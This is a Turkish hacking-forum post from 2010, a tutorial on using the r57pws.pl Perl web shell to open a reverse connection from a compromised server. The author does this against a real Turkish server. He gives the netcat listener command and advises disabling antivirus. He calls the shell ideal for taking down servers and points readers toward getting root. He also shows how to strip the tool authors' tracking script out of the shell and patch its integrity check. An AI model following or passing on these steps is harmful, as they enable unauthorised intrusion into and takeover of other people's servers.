THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

r57pws.pl Ters Bağlantı Anlatım (Resimli)

CaLLouS - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2009
Mesajlar:
3.027
Konular:
1076
Teşekkür (Etti):
191
Teşekkür (Aldı):
1190
Ticaret:
(0) %
24-11-2010 01:00
#1
Wink
r57pws.pl Ters Bağlantı Anlatım (Resimli)
Piyasada bulunan CGI Telnet son günlerde gerek Linux gerekse Windows sunucularda başarılı sonuçlar alır oldu. r57pws.pl yani r57 Perl Web Shell, CGI Telnet'e rakip olan hatta bazı konularda diğer örneklerini solda 0 bırakan mükemmel bir araç. İsmindende anlaşılacağı gibi r57.php Shell'e tasarım açısından benzeyen bu Web Shell özellikle Back Connect yani Ters Bağlantı konusunda oldukça başarılı. Sunucu güvenliği açık olsa dahi Ters Bağlantı kurabilen Shell imkansız sunucuları düşürmek için ideal.

Bende bu örneğimde
Linux 2.6.28 Kernel, PHP Versiyon: 5.2.8, Safe Mode: ON
olan ve her türlü fonksiyonun açık bulunduğu bir Türk sunucusuna back connect yapıyorum.

r57pws.pl Üzerinden Genel bir Görünüm;


r57.php Üzeriden Sunucu Özelliklerini Gösteren bir Resim;



Başlat > Çalıştır Yolunu İzliyorum;



Çalıştır'a cmd yazarak DOS ortamına geçiyorum. Burada gelecek cevap için Port dinlemesi yapıcaz.



Dos ekranına nc -v -l -p 9090 yazıyorum ve enterlıyorum. Burada ki 9090 portu modeminizden açtığınız port numarası oalcaktır. Komut başarılı ise Listining on [any] 9090 adına bir yazı çıkıyor. Ayrıca bu komutun çalışması için C:\Windows\System32 dizini altına nc.exe'yi atmış olmanız gerekmektedir.



r57pws.pl'ye geçiyoruz ve sağ alt kısımda bulunan Backconnect kısmına geliyor. IP kısmının Shell otomatik olarak tanıyor. Sizin yapmanız tek gereken Port kısmına Dos'da belittiğiniz port numarasını girmek ve Connect butonuna basmak



Bağlantı başarılı olursa Dos ekranınızda aşağıda ki gibi görüntü gelmesi gerekmektedir.



Bundan sonra Güvenliği açık sunucuda root olmak çokta zor değil. Forumda arama yaparak Linux Server Root hakkında detaylı bilgiye ulaşabilirsiniz. Ayrıca dikkat etmeniz gereken diğer bir noktada bağlantı işlemi sırasında Antivirüs'ünüz devre dışarı bırakmanızdır. Antivirüsler genelde gelen bağlantıları engellemektedir.


Bunun dışında r57pws.pl üreticileri RST ve GHC Rus Güvenlik Takımları scripte bir çeşit Log aracı yerleştirmişlerdir. Gerçi ben bu güne kadar silmeden kullandığı isemde herhangi bir problem yaşamadım. Malum millet bizim Türk Heykırları gibi Sniffer'da yatıp lahn log gelsede birkaç site düşürsek diye bakmıyor. Ama yinede yok ben Log'suz kullanırım diyorsanız.


r57pws.pl'nin 91 ve 101.satırları arasında ki yazan kısmı silip. ( Sildikten sonra
$j2 = {};imt yazmalısınız. kalacak şekilde. ) Buraya


Kod:
<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(********.referrer)+"&pg="+escape(window.********.href);********.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(********.cookie?"Y":"N");</script>
<script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script>
<script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;********.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script>
<noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0 width="0" height="0" alt=""></a></noscript>
<!--LiveInternet counter--><script language="JavaScript"><!--********.write('<a href="http://www.liveinternet.ru/click" '+'target=_blank><img src="http://counter.yadro.ru/hit?t52.6;r'+escape(********.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" alt="" '+'border=0 width=0 height=0</a>')//--></script>
<!--/LiveInternet-->

Daha sonra 352.Satırdaki;

Kod:
if(length($j2)!=1471) { die(); }

Kısmını aşağıdaki ile değiştirmeniz yeterli olacaktır.

Kod:
if(length($j2)!=3) { die(); }
Alıntıdır ..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler